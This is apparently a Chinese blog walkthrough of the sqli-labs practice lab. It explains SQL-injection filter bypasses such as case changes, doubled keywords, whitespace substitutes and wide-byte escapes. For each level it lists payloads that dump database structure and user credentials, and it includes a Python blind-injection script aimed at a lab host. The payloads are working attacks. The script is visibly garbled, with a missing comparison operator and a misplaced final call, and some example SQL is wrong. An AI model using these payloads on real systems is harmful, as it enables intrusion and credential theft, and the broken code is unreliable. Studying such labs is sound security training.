sqli-labs通关全解---有关过滤的绕过--less23，25~28，32~37--8

preg_replace()

参数	作用
pattern	正则表达式或者要匹配的内容
replacement	要替换的内容
subject	要操作的对象

preg_replace()用于sql注入防护中，主要是将一些疑似攻击的代码进行替换处理，从而使得他无法达到攻击的目的，例如将‘/’替换成空格，将union替换成空格等，但是由于攻击方式的多样化和程序员的疏忽，往往无法过滤掉所有的攻击，甚至可以对此类过滤进行绕过处理。

addslashes() 函数

返回在预定义字符之前添加反斜杠的字符串。即将预定义的字符进行转义

预定义字符是：

单引号（'）
双引号（"）
反斜杠（\）
NULL

提示：该函数可用于为存储在数据库中的字符串以及数据库查询语句准备字符串。

本文列举了一些对此类过滤方法的绕过手段，同样，也可以针对绕过手段，进行更加安全的过滤

MYSQL_real_escape_string（）函数

下列字符受影响：

\x00
\n
\r
\
'
"
\x1a

如果成功，则该函数返回被转义的字符串。如果失败，则返回 false。

本文列举了一些对此类过滤方法的绕过手段，同样，也可以针对绕过手段，进行更加安全的过滤

大小写绕过：

这是最简单也是最鸡肋的绕过方式，可以利用的原因有两个：SQL语句对大小写不敏感、开发人员做的黑名单过滤过于简单。如

select=》SelEct

如果想要防御也很简单，只需要将大小写都加入到过滤表单中即可

双写绕过
双写绕过的原理是后台利用正则匹配到敏感词将其替换为空。即如果过滤了select，我们输入123select456 后会被检测出敏感词，最后替换得到的字符串由123select456 ---> 123456。这种过滤的绕过也很简单即双写select即可，如：selselectect ---> select ，进行一次这样的过滤就双写，两次就三写以此类推。

如果想要进行防御，则一般进行递归替换，直到完全检测不出该元素位置

空格过滤

如果遇到空格被过滤了，主要的几个思路都是想办法找一个代替品，能代替空格的有几个

注释绕过 /**/ :正常情况下只要这个没有被过滤就一定能代替。

括号过滤 () ：将所有的关键字都用括号括起来就可以达到替代空格分隔的作用如下，

正常：select * from user

括号：(select)*(from)(user)

url编码：这种遇到可以试试。用%20代替空格或者用其他的url编码

%09、%0a、%0b、%0c、%0d 、%a0、%00

回车换行替代：回车换行也可以用做分隔功能替代空格。

Tab替代：Tab可以做分隔功能。

防御方法：很简单，将以上情况也加入到过滤列表中即可

注释过滤

遇到我们平常用的 --+ 注释过滤，我们可以用以下几种注释代替：

#、;%00、-- (两个减号一个空格)

用其他数据闭合：

select * from user where id='1'

||

V

select * from user where id='1' or '1' ='1

引号过滤

引号过滤有两种全款，一种是不能出现引号、一种是会被转义，转义的处理方法一般使用宽字节注入的绕过，如果是无法出现引号又需得用引号，可以将参数的值和单引号或者双引号绑定在一起然后转换为16进制最后在输入时在前加0x*****。

逗号过滤

有函数或者指令在使用时需要用到逗号，因此绕过逗号的方法因函数或指令的不同而不同。

宽字节绕过

窄字节：字符大小为一个字节

宽字节: 字符大小为两个字节

像GB2312、GBK、GB18030、BIG5、Shift_JIS等这些编码都是常说的宽字节，也就是只有两字节

英文默认占一个字节，中文占两个字节

原理：宽字节注入发生的位置就是PHP发送请求到MYSQL时字符集使用character_set_client设置值进行了一次编码。在使用PHP连接MySQL的时候，当设置“character_set_client = gbk”时会导致一个编码转换的问题，也就是我们熟悉的宽字节注入

宽字节注入是利用mysql的一个特性，mysql在使用GBK编码（GBK就是常说的宽字节之一，实际上只有两字节）的时候，会认为两个字符是一个汉字（前一个ascii码要大于128，才到汉字的范围）

GBK首字节对应0×81-0xFE，尾字节对应0×40-0xFE（除0×7F），例如%df和%5C会结合；GB2312是被GBK兼容的，它的高位范围是0xA1-0xF7，低位范围是0xA1-0xFE(0x5C不在该范围内)，因此不能使用编码吃掉%5c

当数据库的编码为GBK时，可以使用宽字节注入，宽字节的格式是在地址后先加一个%df，再加单引号，因为反斜杠的编码为%5c，而在GBK编码中，%df%5c是繁体字“連”，所以这时，单引号成功逃逸。

substring()

substr与substring差不多。可以看到从上面本应用逗号的情况到下面直接用from……for代替。

如果需要用到mid()函数，其中也有逗号绕过的方法与substring()相同，用from……for替代逗号。

select substr("admin",2,3)=>select substr("admin" from 2 for 3)

limit 0,1

limit 0,1中存在逗号，那么如果逗号被过滤了我们替代的方法是用offset，即

select * from users limit 0,1=>select * from users limit 0 offset 1;

union

联合注入中我们需要select 1,2,3,4……，而如果过滤了逗号这里又该如何绕呢？这里其实挺有意思的，联合查询select 1,2,3,4……经过测试可以单独写如下

select 1,2,3 union select 4,5,6=>select 1,2,3 union select * from from (select 4)a join (select 5)b join (select 6)c

等于号过滤

如果只过滤了等于号，可以用regexp，like,rlike，如：

select ascii(substr("admin",1,1)) regexp 97;

逻辑运算符绕过

过滤了or,and,xor,no可以用相对应的字符代替： && ，|| ，|，！等

select * from users where id=1  and 1=2=> select * from users where id=1 && 1=2

如果都不能使用，则可以i考虑使用笛卡尔积（^）:

select * from users where id=1^(ascii(substr("admin",1,1))==97)

这种可以直接不使用and or 这些连接符

编码绕过

可以将需要绕过的字符直接转换为16进制编码，然后进行输入

如

errorr0=》6572726f727230

select * from users where username = 0x657282

相似函数互相替代

1）sleep() <-->benchmark()

2）ascii() <-–>hex()、bin()，替代之后再使用对应的进制转string即可

3）group_concat() <–->concat_ws()

4）substr() <--> substring() <--> mid()

5）user() <--> @@user、datadir–>@@datadir

6）ord() <-–> ascii():这两个函数在处理英文时作用相同，但是处理中文等时不一致。
 

7）or过滤导致information无法使用可以用如下几个代替进行查表：

sys.x$schema_flattened_keys

sys.x$schema_table_statistics_with_buffer

sys.schema_table_statistics_with_buffer

字段的查询则利用无列名配合爆破如：

(select 1,xxxxx) > (select * from tablename)

以上的注入方法，很多不仅仅可以运用在sql注入方面，也可以运用在文件上传，XSS等绕过方法

less-23 GET -Error based -Strip comment

本题通过preg_replace函数，对#和--进行过滤

对此，我们通过终止符%00进行绕过

通过前几篇表述的方案进行闭合方式的判断，可以得出闭合方式为单引号

尝试通过联合注入判断数据表的列数：

id=-1' union select 1,2,3'尝试到3时出现了正常回显，可以知道一共有3列

爆破数据库

?id=-1' union select 1,2,database(); %00

爆破数据表

?id=-1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security'; %00

爆破users表的列

?id=-1' union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users'; %00

爆破用户名和密码

?id=-1' union select 1,2,group_concat(username,':',password) from users; %00

尝试使用sqlmap进行注入

sqlmap -u http://192.168.2.15/sqli-labs/Less-23/?id= --dbs --level 3

Less-25 GET-Error based-All your OR & AND belong to us-string quoe

本题将or和and进行了空白替换，但是没有进行递归替换，我们可以通过双写进行绕过

如：我们可以使用 id=1' oorrder by 3 --+

爆破数据库：

?id=1' union select 1,2,database() --+

爆破数据表

?id=-1' union select 1,2,group_concat(table_name) from infoorrmation_schema.tables where table_schema='security' --+

爆破users表的列

?id=-1' union select 1,2,group_concat(column_name) from infoorrmation_schema.columns where table_name='users' --+

爆破用户名和密码

?id=-1' union select 1,2,group_concat(username,':',passwoorrd) from users --+

less-25a GET -Blind Based -ALL your OR & AND belong to us-intiger based

本关和上一关基本一致，区别是两关的闭合方式不同，不多赘述

爆破数据库：?id=-1 union select 1,2,database() --+

爆破数据表：?id=-1 union select 1,2,group_concat(table_name) from infoorrmation_schema.tables where table_schema='security' --+

爆破users表的列：?id=-1 union select 1,2,group_concat(column_name) from infoorrmation_schema.columns where table_name='users' --+

爆破用户名和密码：?id=-1 union select 1,2,group_concat(username,':',passwoorrd) from users --+

less-26 GET -Error-based -All your SPACE and Comments belong to us

通过查看源码，我们可以看到，本关对更多符号进行了过滤，包括or，and，/，--，#,\s等

对于or，and的过滤可以通过双写进行绕过，对于'#'可以通过or '1'='1绕过

\s 匹配所有空白符，包括换行，也就是说这里无法使用空格，可以使用%0a代替空格，或者使用（）将其包裹绕过

使用%0a爆破数据库，发现%0a同样被过滤

?id=-1'%0aunion%0aselect%0a1,2,database()oorr%0a‘1’='1

使用报错注入

?id=-1'||updatexml(1,concat(0x7e,(select(database())),0x7e),1)||'1'='1

爆破数据表，注意information

?id=-1'||updatexml(1,concat(0x7e,(select(group_concat(table_name))from(infoorrmation_schema.tables)where(table_schema)='security'),0x7e),1)||'1'='1

爆破users表的列

?id=-1'||updatexml(1,concat(0x7e,(select(group_concat(column_name))from(infoorrmation_schema.columns)where(table_name)='users'),0x7e),1)||'1'='1

爆破用户名和密码

?id=-1'||updatexml(1,concat(0x7e,(select(group_concat(username,':',passwoorrd))from(users)),0x7e),1)||'1'='1

less-26a GET - Blind Based -All your SPACES and COMMENT blong to us -String-single quotes-Parentthesis

从源码看，该题不再对错误信息进行输出，闭合方式也有所变化，但是会对查询信息进行输出，可以使用联合注入或者盲注，同时继承了上题的过滤方式，可以使用上题的方法进行过滤，暂时按照提议使用脚本进行注入

以下是脚本代码

import requests
 
url = "http://192.168.2.15/sqli-labs/Less-26a/"               #有可利用漏洞的url，根据实际情况填写
headers={ "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36",}    #http request报文头部，根据实际情况填写
 
keylist = [chr(i) for i in range(33, 127)]                                     #包括数字、大小写字母、可见特殊字符
flag = 'Your Login name'                                        #用于判断附加sql语句为真的字符，根据网页回显填写
 
def Database26A():
    n = 100                                                                     #预测当前数据库名称最大可能的长度，根据实际情况填写
    k = 0
    j = n//2 
    length = 0
    db = str()
    while True:
        if j>k and j3:
            payload1 = "1') anandd (length((select (group_concat(schema_name)) from (infoorrmation_schema.schemata)))>"+str(j)+")anandd('1')=('1"           #所有payload根据实际情况填写
            param = {
            "id":payload1,
            }
            response = requests.get(url, params = param, headers = headers)     #GET方法发送含payload的request
            #print(response.request.headers)
            #print(response.text)
            if response.text.find(flag) != -1:
                n=n
                k=j
            else:
                k=k
                n=j
            j=(n-k)//2
        elif j-k==3 or j-k<3:
            for i in range(k-1,n+2):
                payload2 = "1') anandd (length((select (group_concat(schema_name)) from (infoorrmation_schema.schemata)))="+str(i)+")anandd('1')=('1"
                param = {
                "id":payload2,
                }
                response = requests.get(url, params = param, headers = headers)
                if response.text.find(flag) != -1:
                    length = i
                    break
            break
        else:
            break
    print("the name of all databases contains "+str(length)+" characters")
    
    for i in range(1,length+1):
        for c in keylist:
            payload3 = "1') aandnd (substr((select (group_concat(schema_name)) from (infoorrmation_schema.schemata)),"+str(i)+",1)='"+c+"')anandd('1')=('1"
            param = {
            "id":payload3,
            }
            response = requests.get(url, params = param, headers = headers)
            if response.text.find(flag) != -1:
                db = db+c
                break
    print("the name of all databases is "+str(db))
    
def Tables26A(database):
    n = 100                                                                     #预测当前数据库中所有表名称最大可能的长度，根据实际情况填写
    k = 0
    j = n//2
    length = 0
    tname = str()
    while True:
        if j>k and j3:
            payload4 = "1') aandnd (length((select (group_concat(table_name)) from (infoorrmation_schema.tables) where (table_schema = '"+database+"')))>"+str(j)+")anandd('1')=('1"
            param = {
            "id":payload4,
            }
            response = requests.get(url, params = param, headers = headers)
            if response.text.find(flag) != -1:
                n=n
                k=j
            else:
                k=k
                n=j
            j=(n-k)//2
        elif j-k==3 or j-k<3:
            for i in range(k-1,n+2):
                payload5 = "1') aandnd (length((select (group_concat(table_name)) from (infoorrmation_schema.tables) where (table_schema = '"+database+"')))="+str(i)+")anandd('1')=('1"
                param = {
                "id":payload5,
                }
                response = requests.get(url, params = param, headers = headers)
                if response.text.find(flag) != -1:
                    length = i
                    break
            break
        else:
            break
    print("the name of all tables contains "+str(length)+" characters")
    
    for i in range(1,length+1):
        for c in keylist:
            payload6 = "1') anandd (substr((select (group_concat(table_name)) from (infoorrmation_schema.tables) where (table_schema = '"+database+"')),"+str(i)+",1)='"+c+"')anandd('1')=('1"
            param = {
            "id":payload6,
            }
            response = requests.get(url, params = param, headers = headers)
            if response.text.find(flag) != -1:
                tname = tname+c
                break
    print("the name of all tables is "+str(tname))
 
 
def Columns26A(database,table):                                                          #table参数是需要爆破的数据表名称，记得加单引号
    n = 200                                                                     #预测某个表所有列名称最大可能的长度，根据实际情况填写
    k = 0
    j = n//2
    length = 0
    cname = str()
    while True:
        if j>k and j3:
            payload7 = "1') anandd (length((select (group_concat(column_name)) from (infoorrmation_schema.columns) where (table_name = '"+table+"') anandd (table_schema = '"+database+"')))>"+str(j)+")anandd('1')=('1"
            param = {
            "id":payload7,
            }
            response = requests.get(url, params = param, headers = headers)
            if response.text.find(flag) != -1:
                n=n
                k=j
            else:
                k=k
                n=j
            j=(n-k)//2
        elif j-k==3 or j-k<3:
            for i in range(k-1,n+2):
                payload8 = "1') anandd (length((select (group_concat(column_name)) from (infoorrmation_schema.columns) where (table_name = '"+table+"') anandd (table_schema = '"+database+"')))="+str(i)+")anandd('1')=('1"
                param = {
                "id":payload8,
                }
                response = requests.get(url, params = param, headers = headers)
                if response.text.find(flag) != -1:
                    length = i
                    break
            break
        else:
            break
    print("the name of all columns in current table contains "+str(length)+" characters")
    
    for i in range(1,length+1):
        for c in keylist:
            payload9 = "1') anandd (substr((select (group_concat(column_name)) from (infoorrmation_schema.columns) where (table_name = '"+table+"') aandnd (table_schema = '"+database+"')),"+str(i)+",1)='"+c+"')anandd('1')=('1"
            param = {
            "id":payload9,
            }
            response = requests.get(url, params = param, headers = headers)
            if response.text.find(flag) != -1:
                cname = cname+c
                break
    print("the name of all columns in current table is "+str(cname))
 
def Content26A(database,table,col1,col2):                                                #table参数是需要爆破的数据表名称，col1和col2是需要爆破内容的列，记得都要加单引号
    n = 200                                                                     #预测期望获取的数据的最大可能的长度，根据实际情况填写
    k = 0
    j = n//2
    length = 0
    content = str()
    while True:
        if j>k and j3:
            payload10 = "1') aandnd (length((select (group_concat(concat("+col1+",'^',"+col2+"))) from ("+database+"."+table+")))>"+str(j)+")anandd('1')=('1"
            param = {
            "id":payload10,
            }
            response = requests.get(url, params = param, headers = headers)
            if response.text.find(flag) != -1:
                n=n
                k=j
            else:
                k=k
                n=j
            j=(n-k)//2
        elif j-k==3 or j-k<3:
            for i in range(k-1,n+2):
                payload11 = "1') anandd (length((select (group_concat(concat("+col1+",'^',"+col2+"))) from ("+database+"."+table+")))="+str(i)+")anandd('1')=('1"
                param = {
                "id":payload11,
                }
                response = requests.get(url, params = param, headers = headers)
                if response.text.find(flag) != -1:
                    length = i
                    break
            break
        else:
            break
    print("the content contains "+str(length)+" characters")
    
    for i in range(1,length+1):
        for c in keylist:
            payload12 = "1') aandnd (substr((select (group_concat(concat("+col1+",'^',"+col2+"))) from ("+database+"."+table+")),"+str(i)+",1)='"+c+"')anandd('1')=('1"
            param = {
            "id":payload12,
            }
            response = requests.get(url, params = param, headers = headers)
            if response.text.find(flag) != -1:
                content = content+c
                break
    print("the content is "+str(content))
if __name__=="__main__":
    Database26A()
    Tables26A("security")
    Columns26A("security","users")
Content26A("security","table",'1','2')

less-27 GET-Error Based -All your UNION & SELECT Belong to us -String- Single quote

该题的过滤范围进一步增加

但是我们可以通过大小写进行绕过注入，sql语句中的大小写并不影响执行，但是可以进行绕过

爆破数据库

?id=-1'||updatexml(1,concat(0x7e,(sElect(database())),0x7e),1)||'1'='1

爆破数据表
?id=-1'||updatexml(1,concat(0x7e,(sElect(group_concat(table_name))from(information_schema.tables)where(table_schema)='security'),0x7e),1)||'1'='1
爆破users表的列
?id=-1'||updatexml(1,concat(0x7e,(sElect(group_concat(column_name))from(information_schema.columns)where(table_name)='users'),0x7e),1)||'1'='1
爆破用户名和密码
?id=-1'||updatexml(1,concat(0x7e,(sElect(group_concat(username,':',password))from(users)),0x7e),1)||'1'='1

less-27a GET-Blind Baed -All your UNION & SELECT Belong to us -single quote-paraentesis

本关与27关基本相同，唯一的区别就是闭合方式，可以使用大小写绕过select，or，union等词语，可以使用%0a绕过对空格的过滤

#确认回显的列

http://192.168.2.15/sqli-labs/Less-27a/?id=999"%0aununionion%0aSElect%0a4,2,3%0aand%0a"1"="1

#获取服务器上所有数据库的名称

http://192.168.2.15/sqli-labs/Less-27a/?id=999"%0aununionion%0aSElect%0a1,(SElect%0agroup_concat(schema_name)%0afrom%0ainformation_schema.schemata),3%0aand%0a"1"="1

#获取数据库的所有表名称

http://192.168.2.15/sqli-labs/Less-27a/?id=999"%0aununionion%0aSElect%0a1,(SElect%0agroup_concat(table_name)%0afrom%0ainformation_schema.tables%0awhere%0atable_schema='security'),3%0aand%0a"1"="1

#获取sucurity数据库users表的所有列名称

http://192.168.2.15/sqli-labs/Less-27a/?id=999"%0aununionion%0aSElect%0a1,(SElect%0agroup_concat(column_name)%0afrom%0ainformation_schema.columns%0awhere%0atable_schema='security'%0aand%0atable_name='message'),3%0aand%0a"1"="1

#获取security数据库users表的passwd和username列的所有值

http://192.168.2.15/sqli-labs/Less-27a/?id=999"%0aununionion%0aSElect%0a1,(SElect%0agroup_concat(concat(passwd,'^',username))%0afrom%0asecurity.users),3%0aand%0a"1"="1

less-28 GET-Error Based All your UNION & SELECT Belong to us -String -Single quote winth parenthesis

源码中对/，*，-，#，空格，+ ，union\s+select（且包括了大小写）

对空白符过滤不充分，空格可以用其他空白符代替，比如%0aunion select作为一个组合进行过滤，并且没有进行递归过滤，可以通过整体的双写进行绕过例：unionunion%0aselect%0aselect注释符可以通过%00或者('1')=('1进行绕过

判断字段数，使用%0a代替空格，%00截断

?id=1')%0Aorder%0Aby%0A3%0A;%00

判断显示位

?id=a')%0aunion%0aunion%0aselectselect%0a1,2,3;%00

爆破数据库

?id=a')%0aunion%0aunion%0aselectselect%0a1,2,database();%00

爆破数据表

?id=a')%0aunion%0aunion%0aselectselect%0a1,2,group_concat(table_name)%0afrom%0ainformation_schema.tables%0awhere%0atable_schema='security';%00

爆破users表的列

?id=a')%0aunion%0aunion%0aselectselect%0a1,2,group_concat(column_name)%0afrom%0ainformation_schema.columns%0awhere%0atable_name='users';%00

爆破用户名和密码

?id=a')%0aunion%0aunion%0aselectselect%0a1,2,group_concat(username,':',password)%0afrom%0ausers;%00

less 28a GET -Blind Based -All your UNION & SELECT Belong to us Double Quotes

与less28相同，甚至过滤更加简陋，操作方式相同

?id=a')%0aunion%0aunion%0aselectselect%0a1,2,database();%00

爆破数据表

?id=a')%0aunion%0aunion%0aselectselect%0a1,2,group_concat(table_name)%0afrom%0ainformation_schema.tables%0awhere%0atable_schema='security';%00

爆破users表的列

?id=a')%0aunion%0aunion%0aselectselect%0a1,2,group_concat(column_name)%0afrom%0ainformation_schema.columns%0awhere%0atable_name='users';%00

爆破用户名和密码

?id=a')%0aunion%0aunion%0aselectselect%0a1,2,group_concat(username,':',password)%0afrom%0ausers;%00

less-32 Get-Bypass custom filter adding slashes to dangerous chars

我们发现本关对单引号，双引号进行了转义

爆破数据库

?id=-1%df' union select 1,2,database() --+

爆破数据表
?id=-1%df' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=(select database()) --+
爆破users表的列
?id=-1%df' union select 1,2,group_concat(column_name) from information_schema.columns where table_name=(select table_name from information_schema.tables where table_schema=(select database()) limit 3,1)  --+
爆破用户名和密码
?id=-1%df' union select 1,2,(select group_concat(username,0x3a,password) from users)--+

less-33 Bypass AddSlashes

本关使用addslashes函数，对输入进行过滤

提示：该函数可用于为存储在数据库中的字符串以及数据库查询语句准备字符串。

所以本题和上题本质上相同

爆破数据库

?id=-1%df' union select 1,2,database() --+

?id=-1%df' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=(select database()) --+

爆破users表的列

?id=-1%df' union select 1,2,group_concat(column_name) from information_schema.columns where table_name=(select table_name from information_schema.tables where table_schema=(select database()) limit 3,1)  --+

爆破用户名和密码

?id=-1%df' union select 1,2,(select group_concat(username,0x3a,password) from users)--+

less-34 POST Bypass AddSlashes()

本题和上题基本相同，只不过把GET提交方式，转变成了POST提交方式，同样可以进行宽字节绕过。

但是，在url栏中输入%df主要是以16进制形式输入，而在输入框输入%df则是以普通字符串输入。

绕过方法：有些汉字编码为三个字节的编码，我们将三个字节拆开来看，前两个为一组，后面的那个和\相编码为两字节绕过，从而使得单引号逃逸。

判断字段数:

汉' order by 3 #

判断显示位

汉' union select 1,2 #

爆破数据库

汉' union select 1,database() #

爆破数据表

汉' union select 1,table_name from information_schema.tables where table_schema= database() limit 3,1 #

爆破users表的列

汉' union select 1,group_concat(column_name) from information_schema.columns where table_name=(select table_name from information_schema.tables where table_schema=(select database()) limit 3,1) #

爆破用户名密码

汉' union select 1,(select group_concat(username,0x3a,password) from users) #

less-35 GET-Bypass Add Slashes （we dont need them）integer based

这关虽然单引号也被转义了，但是由于这关的id在sql语句中是数字，不涉及闭合，所以这关比前面几关更简单，根本不需要满足宽字节注入的条件

判断显示位：?id=-1 union select 1,2,3 --+

爆破数据库：?id=-1 union select 1,2,database() --+

爆破数据表

?id=-1 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database() --+

爆破users表的列

?id=-1 union select 1,2,group_concat(column_name) from information_schema.columns where table_name=(select table_name from information_schema.tables where table_schema=(select database()) limit 3,1) --+

爆破用户名和密码

?id=-1 union select 1,2,(select group_concat(username,0x3a,password) from users) #

less-36GET-BypassMYSQL_real_escape_string

该题的本意仍是换了一个进行转义，只是换了一个函数，可以使用%df进行绕过

爆破数据库

?id=-1%df' union select 1,2,database() --+

爆破数据表

?id=-1%df' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=(select database()) --+

爆破users表的列

?id=-1%df' union select 1,2,group_concat(column_name) from information_schema.columns where table_name=(select table_name from information_schema.tables where table_schema=(select database()) limit 3,1) --+

爆破用户名和密码

?id=-1%df' union select 1,2,(select group_concat(username,0x3a,password) from users)--+

less-37POST-BypassMySQL_real_escape_string

该题和上一题的区别仍旧是POST提交方式，和之前区别不大，不多赘述

判断字段数

汉' order by 3 #

判断显示位

汉' union select 1,2 #

爆破数据库

汉' union select 1,database() #

爆破数据表

汉' union select 1,table_name from information_schema.tables where table_schema= database() limit 3,1 #

爆破users表的列

汉' union select 1,group_concat(column_name) from information_schema.columns where table_name=(select table_name from information_schema.tables where table_schema=(select database()) limit 3,1) #

爆破用户名和密码

汉' union select 1,(select group_concat(username,0x3a,password) from users) #

你可能感兴趣的:(sql-labs,正则表达式)

jmeter获取返回json参数个数海纳百川_9dc7
我们在用jmeter做测试的时候，返回很多json数据，然后呢想要从中取出某个参数的数量，人工取数的情况下，会很繁琐。因此必须借助正则提取器。操作如下：配置线程组：然后配置正则表达式提取器：2转载：正则表达式提取器说明再用jmeter后置BeanShellPostProcessor3importcom.eclipsesource.json.*;importjava.util.regex.Match
linux正则表达式小黑要上天 linux RegEX linux 正则表达式运维
linux正则表达式，又名常规表达式，是通过一些特殊字符的排列，用以搜索、替换、删除一行或多行字符串。简而言之，linux正则表达式是用在字符串处理中的“表示式”。linux正则表达式并不是工具程序，而是一个字符串处理的标准依据，如果想要以正则表达式的方式处理字符串，就要使用支持正zhen则表达式的工具程序，这类工具程序很多，如：grep、awk、sed等。linux正则表达式对于系统管理员来说很
python 正则表达式断言_Python 之 RE（正则表达式）常用 jck????? python 正则表达式断言
正则表达式基础提取字符串语法说明例可匹配字符串.匹配除了换行符”\n”以外的任意字符a.bacb、adb、a2b、a~b\转义，将转义字符后面的一个字符改变成原来的意思a[b\.\\]cabc、a.c、a\c[]匹配括号内的任意字符a[b,c,d,e]fabd、acf、adf、aef预定义字符语法说明例可匹配字符串^以说明字符串开始^123123abc、123321、123zxc$以说明字符串结尾
web学习笔记（三十四） shan33__ 笔记学习笔记 javascript 原型模式正则表达式
目录1.面向对象的特征2.面向对象的继承方式3.正则表达式3.1如何创建正则表达式3.2边界符3.2[]方括号3.3正则表达式中相关的方法汇总3.4常用元字符含义3.5常用量词1.面向对象的特征封装性：就像是把东西放在一个密封的盒子里一样，只让外部使用者通过指定的接口来访问盒子里的东西，而不需要知道盒子里具体是怎么实现的。这样做可以保护内部数据，让代码更容易维护和重用。继承性：就像家族中的父子关系
Kafka主题二三事慢一点，细一点 Kafka kafka 分布式
客户端如果订阅了多次主题，则以最后一次为主，例如consumer.subscribe(Arrays.asList(topic1));consumer.subscribe(Arrays.asList(topic2));则订阅的只有topic2。消费者订阅主题是支持正则表达式，这样如果有新topic上线，并且匹配正则，则也会消费到这个新topic的内容，比如consumer.subscribe(Pat
Springboot(-) Quartz定时任务cron表达式详解 charles_lun Java菜鸟到老鸟的蜕变之路
目录前言正文1.cron表达式组成2.子表达式范围3.子表达式格式4.字符含义5.表达式例子结束语前言在做springboot整合Quartz的时候，看到指导手册里推荐用cron表达式，然后抱着试试看的态度，额，刚一上手，感觉又回到了正则表达式的恐惧之中，乱，晕，硬着头皮看，终于看完了，有了一定的理解，赶紧整理记录下来，方便自己查看，也方便新接触的同学理解。正文1.cron表达式组成cron表达式
开发技术-Java从字符串中提取小数 JustDI-CM Java开发小技术 java
目录1.前提正则表达式全解析+常用示例常用正则表达式合集，这一篇就够了！！Pattern和Matcher2.实现1.前提项目上请求第三方服务，其中有个字段为字符串和小数的混合，类似：武汉0.1333；北京10.25；其它地区110.1需要将其中的小数取出。技术积累：正则表达式全解析+常用示例常用正则表达式合集，这一篇就够了！！Pattern和Matcher2.实现Stringstr="武汉0.13
正则表达式总结（校验数字,字符串及特殊需求的表达式） polaris9z JavaScript javascript
定义：正则表达式(regularexpression)描述了一种字符串匹配的模式（pattern），可以用来检查一个串是否含有某种子串、将匹配的子串替换或者从某个串中取出符合某个条件的子串等。正则表达式的组件可以是单个的字符、字符集合、字符范围、字符间的选择或者所有这些组件的任意组合。正则表达式是由普通字符（例如字符a到z）以及特殊字符（称为"元字符"）组成的文字模式。模式描述在搜索文本时要匹配的
vim搜索和替换 ketaotech vim vim chrome 编辑器
目录正则表达式1.特殊字符2.字符类(character-classes)3.规则4.交替和分组5.量词(quantifier)和重数(multi)贪婪模式(greedy)非贪婪模式(non-greedy)6.魔法(magic)详解6.1.基本魔法(magic)6.2.无魔法(nomagic)6.3.深度魔法(verymagic)7.正则表达式举例7.1.精确匹配单词7.2.变量,方法或类的重命名
python入门第十一天正则 xinmin
正则表达式普通字符：importre#完全匹配r=re.findall('xin',"wewqefrexinminwdwwrffdasw")print(r)#['xin']元字符：#.:通配符（代指一个字符）r=re.findall('xin.i',"wewqefrexinminwdwwrffdasw")print(r)#['xinmi']#^:匹配开头r=re.findall('^xin',"x
第二十二查询、检索、搜索 smallswan Rust七十二变开发语言
查询在计算机中十分广泛的应用。在字符串或者文本文件中查询关键字，模式匹配，正则表达式。在数组、树、哈希表等数据结构中查询指定数据在数据库中查询在海量非结构文件中查询搜索引擎模式匹配模式匹配是数据结构中字符串的一种基本运算，给定一个子串，要求在某个字符串中找出与该子串相同的所有子串，这就是模式匹配。模式匹配经典问题：strStr()DFA算法usestd::collections::BTreeSet
双非二本找实习前的准备day5 广州悠扬 leetcode java 数据结构算法职场和发展
学习目标：每天2-3到简单sql（刷完即止），每天复习代码随想录上的题目3道算法（时间充足可以继续），今天的八股背少一点，MySQL和Redis各1-2道好了，主攻复习是java基础今日碎碎念：1）今天刷SQL以及复习Java基础，就不写算法了，另外就是复习之前的八股力扣刷题SQL力扣1873：1873.计算特殊奖金解答思路：1）本题练习的主要是如何使用正则表达式以及在查询中使用If，当然，也可以
正则中的\d与\D、\w与\W、\s与\S各代表什么意思 A 风 javascript es6
正则中的\d与\D、\w与\W、\s与\S各代表什么意思\D：表示非数字\w：表示一个字[0－9a-zA-Z_]\W：表示除[0－9a-zA-Z_]之外的字符\s：表示一个空白字符（空格，tab，换页符等）\S：表示一个非空白字符这些都是正则中能够表示一类字符的原子/*$以什么结尾*//*下面的正则表达式匹配0-9的数字里面不能是字符串只能是数字必须是1-5位*/constad=/^[0-9]{1
前端（十八）要你何用杀了算了
1.正则正则//校验QQ/*//JS的方式比较麻烦functioncheckQQ(qq){varflag=true;//默认符合要求if(qq.length>=5&&qq.length2.正则表达式正则表达式//匹配字母a，i表示忽略大小写，g表示全文检索varre=newRegExp('a','ig');varre2=/a/ig;varstr='abc';//调用test方法进行匹配，匹配成功返
hyperscan库接口的使用飞翔公园11223 数据库 oracle mysql c++
Hyperscan库的使用主要涉及到几个关键步骤：编译正则表达式、创建数据库、执行匹配操作以及处理匹配结果。下面我将详细介绍这些步骤中涉及的主要接口和它们的使用方法。1.编译正则表达式在使用Hyperscan进行匹配之前，首先需要将正则表达式编译成Hyperscan能够理解的格式。这一步骤通过hs_compile或hs_compile_multi函数完成。hs_compilehs_error_th
爬虫技术抓取网站数据 Bearjumpingcandy 爬虫
爬虫技术是一种自动化获取网站数据的技术，它可以模拟人类浏览器的行为，访问网页并提取所需的信息。以下是爬虫技术抓取网站数据的一般步骤：发起HTTP请求：爬虫首先会发送HTTP请求到目标网站，获取网页的内容。解析HTML：获取到网页内容后，爬虫会使用HTML解析器解析HTML文档，提取出需要的数据。数据提取：通过使用XPath、CSS选择器或正则表达式等工具，爬虫可以从HTML文档中提取出所需的数据，
Python中re模块的使用拉钩掉头 python 开发语言
在Python中，处理正则表达式的模块是re模块。通过re模块，可以使用正则表达式来进行字符串的匹配、查找、替换等操作。执行效率特别高，可读性不强。1.方法match从头开始匹配返回Match或者Noneimportrer=re.match(".\w{10}","Hello_worldhiworld",re.I)print(type(r),r)ifr:print(r.group())search匹
【MySQL】查询varchar类型字段的内容不包含数字内容忆白笙 MySQL mysql 数据库
问题描述某些情况下需要查询varchar类型字段的内容为特殊内容时SQL语句主要是通过NOTREGEXP和正则表达式来实现，也可以调整正则表达式满足不同效果SELECT*FROMyour_tableWHEREyour_columnNOTREGEXP'^[0-9]+$';
oracle使用正则表达式REGEXP_SUBSTR提取XML里面的内容 qq_39255840 oracle 正则表达式 xml
